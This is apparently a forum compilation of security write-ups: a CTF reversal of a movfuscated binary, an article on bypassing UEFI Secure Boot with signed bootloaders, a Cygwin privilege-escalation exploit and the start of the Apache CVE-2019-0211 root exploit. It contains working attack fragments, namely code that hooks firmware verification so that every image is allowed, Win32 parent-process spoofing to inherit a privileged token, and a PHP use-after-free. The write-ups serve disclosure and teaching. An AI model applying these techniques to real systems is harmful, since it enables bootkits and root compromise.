.plt:08048210 public dispatch
.plt:08048210 dispatch proc near ; DATA XREF: .data:sa_dispatch↓o
.plt:08048210 mov esp, NEW_STACK
.plt:08048216 jmp function
.plt:08048216 dispatch endp

Movfuscator uses SIGSEGV to execute a function, and SIGILL to execute a JMP instruction which jumps to master_loop, since we can't mov to eip; that is invalid in x86.
Execution is controlled using the on variable. This is a boolean variable that determines whether a statement will be executed or not. The master_loop sets the value of on and then disables toggle_execution. This is the structure of an if statement:

def logic_if(condition, dest, src):
    if (condition):
        dest = src
    else:
        discard = src

It then adds 4 to sesp and stores the sum in stack_temp.

Push
The array sel_data contains two members - discard and data_p. This is a MUX which selects data_p if on is set. So, if on is set, eax contains the address of NEW_STACK. The value of esp-4 is then stored in NEW_STACK, which is the stack pointer, and the value of stack_temp is stored at the current stack pointer. The above set of instructions is equivalent to:

mov eax, [stack_temp]
sub esp, 4
mov [esp], eax

It can also be represented as:

push dword [stack_temp]

The sequence of instructions up to 0x0804843C does the following:

mov eax, [sesp]
add eax, 4
push eax
push dword [sesp]
push 0x880484fe

It conditionally sets the value of target to branch_temp. The target variable is the destination of an unconditional jump. In this code, the target is set to 0x88048744. Let's see how jumps are implemented:

on = 1
...
target = jump_destination
; save registers R, F, D
on = 0
...
if (fetch_addr == target) {
    ; restore registers R, F, D
    on = 1
}
...

The above code saves the registers. It then checks whether the fetch address equals the address contained in target. The equal-to comparison is computed for each byte, and the result is the logical AND of the four comparisons. The result of the comparison is stored in the boolean variable b0. If b0 is set, the registers are restored and the on variable is set. This is equivalent to the following, if the on variable is set:

push 0
call _exit

You must be wondering how I deduced the call instruction. Here it is:

Function Call
Function calls are implemented using the SIGSEGV signal.
The array fault is defined like this:

.data:085F7198 fault dd offset no_fault ; DATA XREF: _start+51F↑r
.data:085F719C dd 0
.data:085F71A0 no_fault dd 0

So, fault indexed with on returns 0 if on is set, otherwise a valid address. This return value is dereferenced, which results in a SIGSEGV (Segmentation Fault) if it's zero. But since the value of target is 0x88048744, control jumps to main. In main, the registers are restored and the on flag is set. After that, it pushes fp, R1, R2, R3, F1, dword_804e04c, D1 onto the stack.

The function prologue
It first assigns the frame pointer fp to the current stack pointer and allocates 37 dwords (148 bytes) from the stack. This is equivalent to the following x86:

mov ebp, esp ; ebp is fp
sub esp, 148

It computes fp-19*4 and stores the value of R3 at that address. So, this is basically:

mov R3, 0
mov [fp-19*4], R3

Great! So, we have a dword at fp-0x4c initialized to 0. Then we have an array of bytes at fp-0x48 initialized as follows:

mov R0, 0x1a
mov byte [fp-18*4], R0
mov R0, 0x19
mov byte [fp-0x47], R0
mov R0, 11
mov byte [fp-0x46], R0
mov R0, 0x31
mov byte [fp-0x45], R0
mov R0, 6
mov byte [fp-17*4], R0
mov R0, 4
mov byte [fp-0x43], R0
mov R0, 0x18
mov byte [fp-0x42], R0
mov R0, 0x10
mov byte [fp-0x41], R0
mov R0, 10
mov byte [fp-16*4], R0
mov R0, 0x33
mov byte [fp-0x3f], R0
mov R0, 0x19
mov byte [fp-0x3e], R0
mov R0, 10
mov byte [fp-0x3d], R0
mov R0, 0x33
mov byte [fp-15*4], R0
mov R0, 0
mov byte [fp-0x3b], R0
mov R0, 10
mov byte [fp-0x3a], R0
mov R0, 0x3c
mov byte [fp-0x39], R0
mov R0, 0x19
mov byte [fp-14*4], R0
mov R0, 13
mov byte [fp-0x37], R0
mov R0, 6
mov byte [fp-0x36], R0
mov R0, 0x19
mov byte [fp-0x35], R0
mov R0, 0x3c
mov byte [fp-13*4], R0
mov R0, 14
mov byte [fp-0x33], R0
mov R0, 0x10
mov byte [fp-0x32], R0
mov R0, 0x3c
mov byte [fp-0x31], R0
mov R0, 0x10
mov byte [fp-12*4], R0
mov R0, 12
mov byte [fp-0x2f], R0
mov R0, 0x32
mov byte [fp-0x2e], R0
mov R0, 10
mov byte [fp-0x2d], R0
mov R0, 0x14
mov byte [fp-11*4], R0
mov R0, 13
mov byte [fp-0x2b], R0
mov R0, 6
mov byte [fp-0x2a], R0
mov R0, 0x19
mov byte [fp-0x29], R0
mov R0, 0x3c
mov byte [fp-10*4], R0
mov R0, 0x19
mov byte [fp-0x27], R0
mov R0, 6
mov byte [fp-0x26], R0
mov R0, 0x33
mov byte [fp-0x25], R0
mov R0, 4
mov byte [fp-9*4], R0
mov R0, 10
mov byte [fp-0x23], R0
mov R0, 0x33
mov byte [fp-0x22], R0
mov R0, 0x19
mov byte [fp-0x21], R0
mov R0, 14
mov byte [fp-8*4], R0
mov R0, 6
mov byte [fp-0x1f], R0
mov R0, 0x31
mov byte [fp-0x1e], R0
mov R0, 0x31
mov byte [fp-0x1d], R0
mov R0, 0x1e
mov byte [fp-7*4], R0
mov R0, 0x3c
mov byte [fp-0x1b], R0
mov R0, 0x17
mov byte [fp-0x1a], R0
mov R0, 10
mov byte [fp-0x19], R0
mov R0, 0x31
mov byte [fp-6*4], R0
mov R0, 6
mov byte [fp-0x17], R0
mov R0, 0x19
mov byte [fp-0x16], R0
mov R0, 10
mov byte [fp-0x15], R0
mov R0, 9
mov byte [fp-5*4], R0
mov R0, 0x3c
mov byte [fp-0x13], R0
mov R0, 0x19
mov byte [fp-0x12], R0
mov R0, 12
mov byte [fp-0x11], R0
mov R0, 0x3c
mov byte [fp-4*4], R0
mov R0, 0x19
mov byte [fp-0xf], R0
mov R0, 13
mov byte [fp-0xe], R0
mov R0, 10
mov byte [fp-0xd], R0
mov R0, 0x3c
mov byte [fp-3*4], R0
mov R0, 0
mov byte [fp-0xb], R0
mov R0, 13
mov byte [fp-0xa], R0
mov R0, 6
mov byte [fp-0x9], R0
mov R0, 0x31
mov byte [fp-2*4], R0
mov R0, 0x31
mov byte [fp-7], R0
mov R0, 10
mov byte [fp-6], R0
mov R0, 0x33
mov byte [fp-5], R0
mov R0, 4
mov byte [fp-4], R0
mov R0, 10
mov byte [fp-3], R0
mov R0, 2
mov byte [fp-2], R0

At 0x804ba9c, the int variable at fp-0x4c is set to 0.
If target is 0x8804bb37, it executes the following:

if (target == 0x8804bb37) {
    ; restore the registers
    R{0,1,2,3} = jmp_r{0,1,2,3}
    F{0,1} = jmp_f{0,1}
    D{0,1} = jmp_d{0,1}
    dword_804e044 = dword_85f717c
    dword_804e04c = dword_85f7184
    ; set execution flag
    on = 1
}
mov R3, [fp-19*4]
if (on) {
    mov R3, [R3]
    mov R2, [fp-37*4]
    add R2, R3
    mov R1, [fp-18*4]
    add R3, R1
    mov R0, byte [R3]
    mov R3, R0
    xor R3, 0x53
    sub R3, 3
    xor R3, 0x33
    mov R0, R3
    mov [R2], R0
}

Since target contains 0x88048744, which is not 0x8804bb37, none of the instructions guarded by on are executed. At 0x0804C2D4, we have another branch check:

if (target == 0x8804C2D4) {
    RESTORE_REGS()
    on = 1
}
mov R3, [fp-19*4]
if (on) {
    add R3, 1
    mov [fp-19*4], R3
    mov R3, [fp-19*4]
    setc
    sbb R3, 0x47
    mov branch_temp, 0x8804bb37
}

alu_false contains 1 at index 0 and 0 at the remaining indices, so this sets the complement of the carry flag. The zero flag is evaluated as NOR logic, i.e.

ZF = !(alu_s[0] | alu_s[1] | alu_s[2] | alu_s[3])

alu_b7 is an array of 256 dwords; the first 128 are zero and the rest are 1. Indexing into this array extracts the sign bit (bit 7) of the index.

Okay, so alu_cmp_of represents a truth table. Of what? Well, only two out of the eight minterms are set, so we get the following sum of products:

x'ys + xy's'

where x, y, s are the sign bits of alu_x, alu_y, alu_z. Cool! This is the overflow flag.

It XORs SignFlag and OverflowFlag and sets target to branch_temp, which is 0x8804bb37. By x0ring the sign and overflow flags we get the less-than flag. So, if R3 is less than 0x47, the target is set to 0x8804bb37. Then we have the following:

mov byte [fp-0x4d], 0
if (target == 0x8804CA3B) {
    on = 1
}
if (on) {
    mov esp, fp
    mov D1, [esp]
    mov dword_804e04c, [esp+4]
    sub esp, 4*2
    mov eax, [esp]
    sub esp, 4
    mov F1, eax
    mov eax, [esp]
    sub esp, 4
    mov R3, eax
    mov eax, [esp]
    sub esp, 4
    mov R2, eax
    mov eax, [esp]
    sub esp, 4
    mov R1, eax
    mov eax, [esp]
    sub esp, 4
    mov fp, eax
    mov eax, [esp]
    sub esp, 4
    mov branch_temp, eax
    mov target, branch_temp
    on = 0
}

A SIGILL is raised, which causes control to jump back to the master loop, and execution of instructions is skipped until control reaches 0x804bb37. So this is basically a while loop. Wow!! The code first compares R3 with 0x47 and branches to 0x804bb37 while R3 is less than 0x47. When the condition becomes false, execution continues from 0x804ca3b.

Algorithm

So the logic is:

#include <stdio.h>

int main() {
    int i = 0;
    char arr[] = {
        26, 25, 11, 49, 6, 4, 24, 16, 10, 51, 25, 10, 51, 0, 10, 60,
        25, 13, 6, 25, 60, 14, 16, 60, 16, 12, 50, 10, 20, 13, 6, 25,
        60, 25, 6, 51, 4, 10, 51, 25, 14, 6, 49, 49, 30, 60, 23, 10,
        49, 6, 25, 10, 9, 60, 25, 12, 60, 25, 13, 10, 60, 0, 13, 6,
        49, 49, 10, 51, 4, 10, 2
    };
    for (i = 0; i < 0x47; ++i) {
        arr[i] = ((arr[i] ^ 0x53) - 3) ^ 0x33;
    }
    printf("%.*s\n", (int) sizeof(arr), arr);   /* print the decoded bytes */
    return 0;
}

Executing the above code yields the flag: utflag{sentence_that_is_somewhat_tangentially_related_to_the_challenge}

Sursa: https://x0r19x91.github.io/2019/utctf-mov
17. ValdikSS April 1, 2019 at 01:24 PM

Exploiting signed bootloaders to circumvent UEFI Secure Boot

UEFI, Information Security

(A Russian version of this article is available.)

Modern PC motherboards' firmware has followed the UEFI specification since 2010. In 2013, a new technology called Secure Boot appeared, intended to prevent bootkits from being installed and run. Secure Boot prevents the execution of unsigned or untrusted program code (.efi programs and operating system boot loaders, plus additional hardware firmware like video card and network adapter OPROMs).

Secure Boot can be disabled on any retail motherboard, but a mandatory requirement for changing its state is the physical presence of the user at the computer: it is necessary to enter the UEFI settings when the computer boots, and only then is it possible to change Secure Boot settings. Most motherboards include only Microsoft keys as trusted, which forces bootable-software vendors to ask Microsoft to sign their bootloaders. This process includes a code audit procedure and a justification for the need to sign the file with a globally trusted key, if they want the disk or USB flash drive to work in Secure Boot mode without adding their key on each computer manually. Authors of Linux distributions, hypervisors, antivirus boot disks, and computer recovery software all have to get their bootloaders signed by Microsoft.

I wanted to make a bootable USB flash drive with various computer recovery software that would boot without disabling Secure Boot. Let's see how this can be achieved.

Signed bootloaders of bootloaders

So, to boot Linux with Secure Boot enabled, you need a signed bootloader. Microsoft refuses to sign software licensed under GPLv3 because of the license's anti-tivoization rule, therefore GRUB cannot be signed. To address this issue, the Linux Foundation released PreLoader and Matthew Garrett made shim: small bootloaders that verify the signature or hash of a single file and execute it. PreLoader and shim do not use the UEFI db certificate store, but contain a database of allowed hashes (PreLoader) or certificates (shim) inside the executable file.

Both programs, in addition to automatically executing trusted files, allow you to run any previously untrusted program in Secure Boot mode, but require the physical presence of the user. When executed for the first time, you need to select the certificate to be added or the file to be hashed in the graphical interface, after which the data is added into a special NVRAM variable on the motherboard which is not accessible from the loaded operating system. Files become trusted only for these pre-loaders, not for Secure Boot in general, and still couldn't be loaded without PreLoader or shim.

Untrusted software's first boot with shim.

All modern popular Linux distributions use shim due to its certificate support, which makes it easy to provide updates for the main bootloader without the need for user interaction. In general, shim is used to run GRUB2, the most popular bootloader in Linux.

GRUB2

To prevent signed-bootloader abuse with malicious intentions, Red Hat created patches for GRUB2 that block «dangerous» functions when Secure Boot is enabled: insmod/rmmod, appleloader, linux (replaced by linuxefi), multiboot, xnu, memrw, iorw. The chainloader module, which loads arbitrary .efi files, introduced its own custom internal .efi (PE) loader that does not use the UEFI LoadImage/StartImage functions, as well as code to validate the loaded files via shim, in order to preserve the ability to load files trusted by shim but not trusted in terms of UEFI.
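For contrast, here is roughly what standard UEFI chainloading looks like: a hedged, EDK2-style sketch (error handling trimmed, function name mine). gBS->LoadImage() is exactly the point where the firmware's Secure Boot verification runs, which is what the patched GRUB avoids by parsing and mapping the PE file itself:

#include <Uefi.h>

EFI_STATUS ChainLoad(EFI_HANDLE ParentImage,
                     EFI_SYSTEM_TABLE *SystemTable,
                     EFI_DEVICE_PATH_PROTOCOL *FilePath)
{
    EFI_BOOT_SERVICES *gBS = SystemTable->BootServices;
    EFI_HANDLE Child = NULL;
    EFI_STATUS Status;

    /* Signature verification happens inside LoadImage(); with Secure Boot
     * on, an untrusted binary fails here with EFI_SECURITY_VIOLATION or
     * EFI_ACCESS_DENIED and never reaches StartImage(). */
    Status = gBS->LoadImage(FALSE, ParentImage, FilePath, NULL, 0, &Child);
    if (EFI_ERROR(Status)) {
        return Status;
    }
    return gBS->StartImage(Child, NULL, NULL);
}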
It's not exactly clear why this method is preferable: UEFI allows one to redefine (hook) the UEFI verification functions, which is how PreLoader works, and indeed this very feature is present in shim, but disabled by default. Anyway, using the signed GRUB from some Linux distribution does not suit our needs. There are two ways to create a universal bootable flash drive that would not require adding the keys of each executable file to the trusted list:

- Use a modded GRUB with an internal EFI loader, without digital signature verification or module restrictions;
- Use a custom (second) pre-loader which hooks the UEFI file verification functions (EFI_SECURITY_ARCH_PROTOCOL.FileAuthenticationState, EFI_SECURITY2_ARCH_PROTOCOL.FileAuthentication).

The second method is preferable because software executed this way can load and start other software; for example, a UEFI shell can execute any program. The first method does not provide this, allowing only GRUB to execute arbitrary files. Let's modify PreLoader: remove all unnecessary features and patch the verification code to allow everything. The disk architecture is as follows:

   ______          ______          ______
  ╱│     │        ╱│     │        ╱│     │
 /_│     │   →   /_│     │   →   /_│     │
 │       │   →   │       │   →   │       │
 │  EFI  │   →   │  EFI  │   →   │  EFI  │
 │_______│       │_______│       │_______│
 BOOTX64.efi     grubx64.efi     grubx64_real.efi
 (shim)          (FileAuthentication   (GRUB2)
                  override)
    ↓↓↓               ↑
                      ↑
   ______             ↑
  ╱│     │            ║
 /_│     │            ║
 │       │  ══════════╝
 │  EFI  │
 │_______│
 MokManager.efi
 (Key enrolling tool)

This is how Super UEFIinSecureBoot Disk has been made. Super UEFIinSecureBoot Disk is a bootable image with the GRUB2 bootloader, designed to be used as a base for recovery USB flash drives.

Key feature: the disk is fully functional with UEFI Secure Boot mode activated. It can launch any operating system or .efi file, even with an untrusted, invalid or missing signature. The disk can be used to run various Linux Live distributions, WinPE environments, and network boot, without disabling Secure Boot mode in the UEFI settings, which can be convenient for performing maintenance on someone else's PC or on corporate laptops, for example ones with the UEFI settings locked with a password.

The image contains 3 components: the shim pre-loader from Fedora (signed with a Microsoft key which is pre-installed in most motherboards and laptops), a modified Linux Foundation PreLoader (with digital signature verification of executed files disabled), and a modified GRUB2 loader.

On the first boot it's necessary to select the certificate using MokManager (which starts automatically); after that everything will work just as with Secure Boot disabled: GRUB loads any unsigned .efi file or Linux kernel, and executed EFI programs can load any other untrusted executables or drivers. To demonstrate the disk's functions, the image contains Super Grub Disk (a set of scripts to find and boot an OS even if the bootloader is broken), GRUB Live ISO Multiboot (a set of scripts to boot Linux Live distros directly from an ISO file), One File Linux (a kernel and initrd in a single file, for system recovery) and several UEFI utilities. The disk is also compatible with UEFI without Secure Boot, and with older PCs with BIOS.
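To make the "hook the verification functions" idea concrete, here is a hedged, EDK2-style sketch of what a modified PreLoader boils down to. This is simplified and the names are mine; the real code also hooks EFI_SECURITY_ARCH_PROTOCOL.FileAuthenticationState and keeps the original pointer so it can chain to it:

#include <Uefi.h>
#include <Protocol/Security2.h>

STATIC EFI_SECURITY2_FILE_AUTHENTICATION mOrigFileAuthentication;

/* Replacement verifier: report every image as trusted. */
STATIC EFI_STATUS EFIAPI
FileAuthenticationAllowAll(IN CONST EFI_SECURITY2_ARCH_PROTOCOL *This,
                           IN CONST EFI_DEVICE_PATH_PROTOCOL *DevicePath,
                           IN VOID *FileBuffer,
                           IN UINTN FileSize,
                           IN BOOLEAN BootPolicy)
{
    return EFI_SUCCESS;
}

EFI_STATUS HookSecurity2(EFI_BOOT_SERVICES *gBS)
{
    EFI_SECURITY2_ARCH_PROTOCOL *Security2;
    EFI_STATUS Status;

    Status = gBS->LocateProtocol(&gEfiSecurity2ArchProtocolGuid,
                                 NULL, (VOID **) &Security2);
    if (EFI_ERROR(Status)) {
        return Status;
    }
    mOrigFileAuthentication = Security2->FileAuthentication; /* saved for chaining */
    Security2->FileAuthentication = FileAuthenticationAllowAll;
    return EFI_SUCCESS;
}

With such a hook installed, LoadImage() succeeds for any binary, so everything chainloaded afterwards (GRUB, kernels, arbitrary .efi tools) runs as if Secure Boot were off.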
Signed bootloaders

I was wondering whether it is possible to bypass the first-boot key enrollment through shim. Could there be signed bootloaders that allow you to do more than their authors expected? As it turns out, there are such loaders. One of them is used in Kaspersky Rescue Disk 18, an antivirus boot disk. GRUB from the disk allows you to load modules (the insmod command), and a module in GRUB is just executable code.

The pre-loader on the disk is a custom one. Of course, you can't just use GRUB from the disk to load untrusted code. It is necessary to modify the chainloader module so that GRUB does not use the UEFI LoadImage/StartImage functions, but instead loads the .efi file into memory itself, performs relocation, finds the entry point and jumps to it. Fortunately, almost all the necessary code is present in Red Hat's GRUB Secure Boot repository; the only problem is that the PE header parser is missing. GRUB gets the parsed header from shim, in response to a function call via a special protocol. This is easily fixed by porting the appropriate code from shim or PreLoader to GRUB.

This is how Silent UEFIinSecureBoot Disk has been made. The final disk architecture looks as follows:

   ______          ______          ______
  ╱│     │        ╱│     │        ╱│     │
 /_│     │       /_│     │   →   /_│     │
 │       │       │       │   →   │       │
 │  EFI  │       │  EFI  │   →   │  EFI  │
 │_______│       │_______│       │_______│
 BOOTX64.efi     grubx64.efi     grubx64_real.efi
 (Kaspersky      (FileAuthentication   (GRUB2)
  Loader)         override)
    ↓↓↓               ↑
                      ↑
   ______             ↑
  ╱│     │            ║
 /_│     │            ║
 │       │  ══════════╝
 │  EFI  │
 │_______│
 fde_ld.efi + custom chain.mod
 (Kaspersky GRUB2)

The end

In this article we demonstrated the existence of insufficiently reliable bootloaders signed with the Microsoft key, which allow booting untrusted code in Secure Boot mode. Using signed Kaspersky Rescue Disk files, we achieved silent booting of arbitrary untrusted .efi files with Secure Boot enabled, without the need to add a certificate to the UEFI db or the shim MOK list. These files can be used both for good deeds (booting from USB flash drives) and for evil ones (installing bootkits without the computer owner's consent).

I assume that the Kaspersky bootloader's signing certificate will not live long, and that it will be added to the global UEFI certificate revocation list, which will be installed on computers running Windows 10 via Windows Update, breaking Kaspersky Rescue Disk 18 and Silent UEFIinSecureBoot Disk. Let's see how soon this happens.

Super UEFIinSecureBoot Disk download: https://github.com/ValdikSS/Super-UEFIinSecureBoot-Disk
Silent UEFIinSecureBoot Disk download (ZeroNet Git Center network): http://127.0.0.1:43110/1KVD7PxZVke1iq4DKb4LNwuiHS4UzEAdAv/
About ZeroNet

Sursa: https://habr.com/en/post/446238/
18. Exploiting a privileged zombie process handle leak on Cygwin

March 29th, 2019

Vulnerability

Two months ago, I was playing with Cygwin and noticed, using Process Hacker, that all Cygwin processes inherited dead process handles. The bash.exe process spawned by the SSH daemon after a successful connection (1) runs with a newly created token as the limited test user. Indeed, Cygwin's SSHD worked at the time under an administrator account (cyg_server), emulating set(e)uid by creating a new user token with the undocumented NtCreateToken. See the Cygwin documentation for more information about the change in version 3.0. The same bash.exe process inherits 3 handles to non-existent processes with full access rights (2). Tracing process creation and termination with Process Monitor during the SSH connection revealed that these leaked handles actually belong to privileged processes (3) running as cyg_server.

Exploitation

So what can we do with privileged zombie process handles? Since we have full access (PROCESS_ALL_ACCESS), we can try the following:

- OpenProcessToken: FAIL, access denied
- PROCESS_VM_OPERATION: FAIL, any VM operation will fail because the process no longer has an address space
- PROCESS_CREATE_THREAD: FAIL, same problem; with no address space, creating a thread in the process will NOT work
- PROCESS_DUP_HANDLE: FAIL, access denied on DuplicateHandle (not sure why :D)
- PROCESS_CREATE_PROCESS: SUCCESS, finally!

Let's see how to use this privilege. When creating a process, the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute (set in the attribute list of a STARTUPINFOEX structure) allows the calling process to use a different process as the parent of the process being created. The calling process must have the PROCESS_CREATE_PROCESS access right on the process handle used as the parent. From the Windows documentation: "Attributes inherited from the specified process include handles, the device map, processor affinity, priority, quotas, the process token, and job object."

So the spawned process will use the privileged token and thus run as cyg_server.

This exploitation technique is not new, and there may be other ways to exploit this case, but I wanted to show a real-world example of creating a process with a parent handle instead of just posting about it. I find it cleaner than injecting shellcode into a privileged process to spawn a process.

Exploit source

Fix

The vulnerability is now fixed with Cygwin version 3.0, thanks to the maintainers, who were very responsive.

Commit 1: Restricting permissions
Commit 2: Restricting permissions on exec
Commit 3: Removing the handle inheritance
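A minimal Win32 sketch of that re-parenting trick, for illustration only (hPrivileged stands in for the leaked zombie handle, and most error checking is trimmed):

#include <windows.h>

BOOL SpawnWithParent(HANDLE hPrivileged)
{
    STARTUPINFOEXW si = { { sizeof(si) } };   /* cb must cover the EX struct */
    PROCESS_INFORMATION pi;
    SIZE_T size = 0;

    /* size query, then allocate and initialize the attribute list */
    InitializeProcThreadAttributeList(NULL, 1, 0, &size);
    si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)
        HeapAlloc(GetProcessHeap(), 0, size);
    InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &size);

    /* re-parent the child under the privileged (zombie) process */
    UpdateProcThreadAttribute(si.lpAttributeList, 0,
                              PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
                              &hPrivileged, sizeof(hPrivileged), NULL, NULL);

    WCHAR cmd[] = L"C:\\Windows\\System32\\cmd.exe";
    BOOL ok = CreateProcessW(NULL, cmd, NULL, NULL, FALSE,
                             EXTENDED_STARTUPINFO_PRESENT, NULL, NULL,
                             &si.StartupInfo, &pi);

    DeleteProcThreadAttributeList(si.lpAttributeList);
    HeapFree(GetProcessHeap(), 0, si.lpAttributeList);
    if (ok) { CloseHandle(pi.hThread); CloseHandle(pi.hProcess); }
    return ok;
}

The child inherits the zombie's token, so it runs with the zombie's privileges even though the caller is unprivileged.

Sursa: https://masthoon.github.io/exploit/2019/03/29/cygeop.html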
19. Web Security Academy

Welcome to the Web Security Academy. This is a brand new learning resource providing free training on web security vulnerabilities, techniques for finding and exploiting bugs, and defensive measures for avoiding them. The Web Security Academy contains high-quality learning materials, interactive vulnerability labs, and video tutorials. You can learn at your own pace, wherever and whenever suits you. Best of all, everything is free!

To access the vulnerability labs and track your progress, you'll just need to log in. Sign up if you don't have an account already. To get things started, we're covering four of the most serious "classic" vulnerabilities:

- SQL injection
- Cross-site scripting (XSS)
- OS command injection
- File path traversal (directory traversal)

Over the coming months, we'll be adding a series of further topics and a large number of new vulnerability labs. The team behind the Web Security Academy includes Dafydd Stuttard, author of The Web Application Hacker's Handbook.

Sursa: https://portswigger.net/web-security
20. CARPE (DIEM): CVE-2019-0211 Apache Root Privilege Escalation

2019-04-03

Introduction

From version 2.4.17 (Oct 9, 2015) to version 2.4.38 (Apr 1, 2019), Apache HTTP suffers from a local root privilege escalation vulnerability due to an out-of-bounds array access leading to an arbitrary function call. The vulnerability is triggered when Apache gracefully restarts (apache2ctl graceful). In standard Linux configurations, the logrotate utility runs this command once a day, at 6:25AM, in order to reset log file handles.

The vulnerability affects mod_prefork, mod_worker and mod_event. The following bug description, code walkthrough and exploit target mod_prefork.

Bug description

In MPM prefork, the main server process, running as root, manages a pool of single-threaded, low-privilege (www-data) worker processes, meant to handle HTTP requests. In order to get feedback from its workers, Apache maintains a shared-memory area (SHM), the scoreboard, which contains various information such as the workers' PIDs and the last request they handled. Each worker is meant to maintain the process_score structure associated with its PID, and has full read/write access to the SHM.

ap_scoreboard_image: pointers to the shared memory block

(gdb) p *ap_scoreboard_image
$3 = {
  global = 0x7f4a9323e008,
  parent = 0x7f4a9323e020,
  servers = 0x55835eddea78
}
(gdb) p ap_scoreboard_image->servers[0]
$5 = (worker_score *) 0x7f4a93240820

Example of shared memory associated with worker PID 19447

(gdb) p ap_scoreboard_image->parent[0]
$6 = {
  pid = 19447,
  generation = 0,
  quiescing = 0 '\000',
  not_accepting = 0 '\000',
  connections = 0,
  write_completion = 0,
  lingering_close = 0,
  keep_alive = 0,
  suspended = 0,
  bucket = 0          <- index for all_buckets
}
(gdb) ptype *ap_scoreboard_image->parent
type = struct process_score {
  pid_t pid;
  ap_generation_t generation;
  char quiescing;
  char not_accepting;
  apr_uint32_t connections;
  apr_uint32_t write_completion;
  apr_uint32_t lingering_close;
  apr_uint32_t keep_alive;
  apr_uint32_t suspended;
  int bucket;         <- index for all_buckets
}

When Apache gracefully restarts, its main process kills the old workers and replaces them with new ones. At this point, every old worker's bucket value will be used by the main process to index one of its own arrays, all_buckets.

all_buckets

(gdb) p $index = ap_scoreboard_image->parent[0]->bucket
(gdb) p all_buckets[$index]
$7 = {
  pod = 0x7f19db2c7408,
  listeners = 0x7f19db35e9d0,
  mutex = 0x7f19db2c7550
}
(gdb) ptype all_buckets[$index]
type = struct prefork_child_bucket {
  ap_pod_t *pod;
  ap_listen_rec *listeners;
  apr_proc_mutex_t *mutex;  <--
}
(gdb) ptype apr_proc_mutex_t
apr_proc_mutex_t {
  apr_pool_t *pool;
  const apr_proc_mutex_unix_lock_methods_t *meth;  <--
  int curr_locked;
  char *fname;
  ...
}
(gdb) ptype apr_proc_mutex_unix_lock_methods_t
apr_proc_mutex_unix_lock_methods_t {
  ...
  apr_status_t (*child_init)(apr_proc_mutex_t **, apr_pool_t *, const char *);  <--
  ...
}

No bounds checks happen. Therefore, a rogue worker can change its bucket index and make it point into the shared memory, in order to control the prefork_child_bucket structure upon restart. Eventually, and before privileges are dropped, mutex->meth->child_init() is called. This results in an arbitrary function call as root.
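The bug pattern in miniature, as an illustrative sketch rather than Apache's literal code: an index read back from attacker-writable shared memory selects an entry of a trusted array without any bounds check, and a function pointer reachable from that entry is then called as root.

#include <stdio.h>

typedef struct { int (*child_init)(void); } lock_methods;
typedef struct { lock_methods *meth; } proc_mutex;
typedef struct { void *pod; void *listeners; proc_mutex *mutex; } child_bucket;

static int legit_child_init(void) { puts("child_init called as root"); return 0; }
static lock_methods meth = { legit_child_init };
static proc_mutex mutex = { &meth };
static child_bucket all_buckets[1] = { { NULL, NULL, &mutex } };

/* idx comes straight from the SHM scoreboard, where a compromised worker
 * can write any value; there is no bounds check, so a negative index can
 * reach a fake bucket planted inside the shared memory segment. */
static int respawn(int idx)
{
    child_bucket *my_bucket = &all_buckets[idx];   /* OOB when idx != 0 */
    return my_bucket->mutex->meth->child_init();   /* arbitrary call    */
}

int main(void)
{
    return respawn(0);   /* benign demo index; the exploit uses negative ones */
}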
Vulnerable code

We'll go through server/mpm/prefork/prefork.c to find out where and how the bug happens. A rogue worker changes its bucket index in shared memory to make it point to a structure of its own, also in the SHM. At 06:25AM the next day, logrotate requests a graceful restart from Apache. Upon this, the main Apache process will first kill the workers, and then spawn new ones. The killing is done by sending SIGUSR1 to the workers; they are expected to exit ASAP. Then, prefork_run() (L853) is called to spawn new workers. Since retained->mpm->was_graceful is true (L861), the workers are not restarted straight away. Instead, we enter the main loop (L933) and monitor dead workers' PIDs.

When an old worker dies, ap_wait_or_timeout() returns its PID (L940). The index of the process_score structure associated with this PID is stored in child_slot (L948). If the death of this worker was not fatal (L969), make_child() is called with ap_get_scoreboard_process(child_slot)->bucket as its third argument (L985). As previously said, bucket's value has been changed by the rogue worker.

make_child() creates a new child by fork()ing (L671) the main process. The OOB read happens (L691), and my_bucket is therefore under the attacker's control. child_main() is called (L722), and the function call happens a bit further on (L433). SAFE_ACCEPT(<code>) will only execute <code> if Apache listens on two or more ports, which is often the case since a server typically listens over both HTTP (80) and HTTPS (443). Assuming <code> is executed, apr_proc_mutex_child_init() is called, which results in a call to (*mutex)->meth->child_init(mutex, pool, fname) with mutex under control. Privileges are dropped a bit later in the execution (L446).

Exploitation

The exploitation is a four-step process:

1. Obtain R/W access to a worker process
2. Write a fake prefork_child_bucket structure in the SHM
3. Make all_buckets[bucket] point to the structure
4. Await 6:25AM to get an arbitrary function call

Advantages:
- The main process never exits, so we know where everything is mapped by reading /proc/self/maps (ASLR/PIE useless)
- When a worker dies (or segfaults), it is automatically restarted by the main process, so there is no risk of DoSing Apache

Problems:
- PHP does not allow reading/writing /proc/self/mem, which blocks us from simply editing the SHM
- all_buckets is reallocated after a graceful restart (!)

1. Obtain R/W access to a worker process

PHP UAF 0-day

Since mod_prefork is often used in combination with mod_php, it seems natural to exploit the vulnerability through PHP. CVE-2019-6977 would be a perfect candidate, but it was not out when I started writing the exploit. I went with a 0-day UAF in PHP 7.x (which seems to work in PHP 5.x as well):

PHP UAF

<?php

class X extends DateInterval implements JsonSerializable
{
    public function jsonSerialize()
    {
        global $y, $p;
        unset($y[0]);
        $p = $this->y;
        return $this;
    }
}

function get_aslr()
{
    global $p, $y;
    $p = 0;
    $y = [new X('PT1S')];
    json_encode([1234 => &$y]);
    print("ADDRESS: 0x" . dechex($p) . "\n");
    return $p;
}

get_aslr();

This is a UAF on a PHP object: we unset $y[0] (an instance of X), but it is still usable via $this.

UAF to Read/Write

We want to achieve two things:
- Read memory to find all_buckets' address
- Edit the SHM to change the bucket index and add our custom mutex structure

Luckily for us, PHP's heap is located before those two in memory.
Memory addresses of PHP's heap, ap_scoreboard_image->* and all_buckets

root@apaubuntu:~# cat /proc/6318/maps | grep libphp | grep rw-p
7f4a8f9f3000-7f4a8fa0a000 rw-p 00471000 08:02 542265 /usr/lib/apache2/modules/libphp7.2.so

(gdb) p *ap_scoreboard_image
$14 = {
  global = 0x7f4a9323e008,
  parent = 0x7f4a9323e020,
  servers = 0x55835eddea78
}
(gdb) p all_buckets
$15 = (prefork_child_bucket *) 0x7f4a9336b3f0

